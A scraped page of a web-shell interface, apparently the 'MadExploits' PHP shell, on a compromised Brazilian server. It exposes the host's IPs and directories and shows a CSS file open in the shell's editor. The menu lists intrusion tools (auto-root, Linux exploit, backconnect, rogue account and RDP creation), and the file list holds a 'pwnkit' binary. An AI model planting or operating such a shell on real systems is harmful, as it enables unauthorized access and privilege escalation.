Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
hubnog /
.trash /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
build.1
[ DIR ]
drwxrwxr-x
flystart
[ DIR ]
drwxrwxr-x
flystart.2
[ DIR ]
drwxrwxr-x
flystart_funciona
[ DIR ]
drwxrwxr-x
flystart_nao_funciona
[ DIR ]
drwxrwxr-x
flystart_old
[ DIR ]
drwxrwxr-x
flystart_old.1
[ DIR ]
drwxr-xr-x
homologacaoppm.hubnogueira.com...
[ DIR ]
drwxr-x---
old_homologacao.hubnogueira.co...
[ DIR ]
drwxr-x---
portal-nogueira
[ DIR ]
drwxr-xr-x
portal-nogueira.1
[ DIR ]
drwxrwxr-x
portal-nogueira_old
[ DIR ]
drwxr-x---
webroot_old.1
[ DIR ]
drwxr-xr-x
.htaccess
143
B
-rw-r--r--
.htaccess_old
126
B
-rw-r--r--
.htaccess_to_delete
123
B
-rw-rw-r--
.mad-root
0
B
-rw-r--r--
.trash_restore
716
B
-rw-------
consultation.css
4.46
KB
-rw-r--r--
custom.css
23.28
KB
-rw-r--r--
index.html
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
style.css
181.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : consultation.css
/* Estilos Gerais */ * { box-sizing: border-box; } body { margin: 0; padding: 0; } .text-blue { color: #5058F2; } .text-light-blue { color: #007AFF; } /* Estilos do Banner */ .banner { height: 80vh; overflow: hidden; } .banner img { width: 100%; height: 100%; object-fit: cover; object-position: right; display: block; } .banner-text { position: absolute; top: 45%; left: 15%; transform: translateY(-50%); z-index: 2; color: white; text-align: left; text-shadow: 2px 2px 8px rgba(0, 0, 0, 0.5); } .banner-text h1 { font-size: 3rem; } .banner-text p { font-size: 1.25rem; } /* Estilos de Botões */ #criarConta { background-color: #5058F2; color: white; max-width: fit-content; padding: 12px; } #criarConta:hover { background-color: #373CA6; } #btnEnviar { background-color: #5058F2; color: white; padding: 12px; } #btnEnviar:hover { background-color: #373CA6; } /* Estilos da Seção de Cursos */ .bg-dark-blue { background-color: #002049; } .bg-darker-blue { background-color: #001732; } /* Estilos de Cartões */ .card { border-radius: 15px; overflow: hidden; border: none; background-position: center; transition: transform 0.3s ease, box-shadow 0.3s ease; } .card:hover { transform: translateY(-5px); box-shadow: 0 4px 20px rgba(0, 0, 0, 0.3); } .image-course { object-fit: cover; height: 300px; transition: all 2s ease-in-out; overflow: hidden; border: none; } .gradient { background: rgb(2, 0, 36); background: linear-gradient(0deg, rgba(2, 0, 36, 1) 0%, rgba(78, 255, 0, 0) 100%); opacity: 0.8; transition: opacity 0.3s ease; } .card:hover .gradient { opacity: 1; } /* Estilos de Listas */ .number-circle { background-color: #007bff; color: white; min-width: 40px; min-height: 40px; display: flex; justify-content: center; align-items: center; border-radius: 50%; font-weight: bold; } .list-item { display: flex; align-items: flex-start; margin-top: 20px; } .list-item-text { margin-left: 15px; } /* Estilos do Formulário */ #form { min-width: max-content; margin-left: auto; } @media (max-width: 430px) { #form { min-width: 0px; } } @media (max-width: 992px) { #form { margin-left: 0%; } } /* Estilos de Responsividade */ /* @media (max-width: 992px) { .mt-md-50px { margin-top: 50px !important; } #contact-session { padding: 0 !important; } #form { margin: 0; width: 100%; min-width: none; } .banner-text { top: 40%; } .banner-text h1 { font-size: 2rem; } .banner-text p { font-size: 1rem; } } */ @media (max-width: 730px) { #contact-session { padding: 0 !important; } } @media (max-width: 1200px) { .banner-text { left: 10%; } .banner-text h1 { font-size: 2.5rem; } .banner-text p { font-size: 1.2rem; } #criarConta { font-size: 1rem; padding: 10px 20px; } } @media (max-width: 615px) { .banner-text { top: 60%; } .banner-text h1 { font-size: 1.5rem; } .banner-text p { font-size: 1rem; } } @media (max-width: 320px) { .banner-text h1 { font-size: 1.5rem; } .banner-text p { font-size: 1rem; } } @media (min-width: 540px) { iframe { min-height: 250px; min-width: 450px; } } @media (max-width: 540px) { .gradient { opacity: 1; } }
Close